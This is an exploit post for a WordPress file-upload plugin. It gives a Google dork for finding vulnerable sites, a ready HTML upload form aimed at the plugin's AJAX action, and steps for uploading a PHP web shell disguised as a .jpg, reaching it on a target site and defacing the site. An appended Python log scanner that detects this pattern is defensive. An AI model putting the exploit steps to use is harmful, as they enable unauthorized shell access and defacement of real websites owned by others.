Wordpress Plugins jQuery Html5 File Upload Vulnerability


#################################################################################
# Wordpress Plugins jQuery Html5 File Upload Vulnerability | CSRF
# Author : Akbar Dravinky
# Google Dork: inurl:/wp-content/plugins/jquery-html5-file-upload/
# Tested on: Win 7, Linux
# 
#################################################################################


# [!] Exploit : http://127.0.0.1/wp-admin/admin-ajax.php?action=load_ajax_function

# [!] File Location : http://127.0.0.1/wp-content/uploads/files/guest/file.php.jpg

First, find a target using the dork above.
Signs of the vuln:
you just go to the CSRF form
and upload a shell with the extension file.php.jpg

#[*] CSRF:
#################################################################################
<html>
<body>
<form method="POST" action="http://127.0.0.1/wp-admin/admin-ajax.php?action=load_ajax_function"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
</body>
</html>
#################################################################################
Now look at the image above: my shell has been uploaded, all that is left is to access it.
Example:

http://target.co.li/wp-content/uploads/files/guest/file.php.jpg

See, it has been uploaded, easy, right?
Now you just upload your deface script :v
Thank you >_<
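
A defender-side check for the pattern described above, as an added example that is not part of the original post: it flags access-log lines that POST to the `load_ajax_function` AJAX action, and requests for files under `wp-content/uploads/` whose name hides a PHP extension such as `file.php.jpg`. The log lines, function names and the extension list are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Extensions a PHP handler may execute even when they are not the final
# extension (assumption: adjust the set to your server's handler config).
EXEC_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}

# Request part of a combined-format access log line.
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def has_hidden_exec_ext(path):
    """True if any extension in the file name (not only the last) is executable."""
    name = path.rsplit("/", 1)[-1].lower()
    return any(part in EXEC_EXTS for part in name.split(".")[1:])

def classify(line):
    """Return 'upload-endpoint', 'exec-in-uploads' or None for one log line."""
    m = REQ_RE.search(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    action = parse_qs(url.query).get("action", [])
    if (m["method"] == "POST" and url.path.endswith("/wp-admin/admin-ajax.php")
            and "load_ajax_function" in action):
        return "upload-endpoint"
    if "/wp-content/uploads/" in url.path and has_hidden_exec_ext(url.path):
        return "exec-in-uploads"
    return None

def scan(lines):
    """Return (line_number, finding) for every suspicious line."""
    return [(n, f) for n, line in enumerate(lines, 1) if (f := classify(line))]

# Constructed sample log lines (not from a real server).
SAMPLE = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 12',
    '203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "POST /wp-admin/admin-ajax.php?action=load_ajax_function HTTP/1.1" 200 310',
    '203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "GET /wp-content/uploads/files/guest/file.php.jpg HTTP/1.1" 200 45',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /wp-content/uploads/2024/01/photo.jpg HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for n, finding in scan(SAMPLE):
        print(n, finding)
```

The same `has_hidden_exec_ext` test can be run over a directory listing of `wp-content/uploads/` to find files already on disk.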
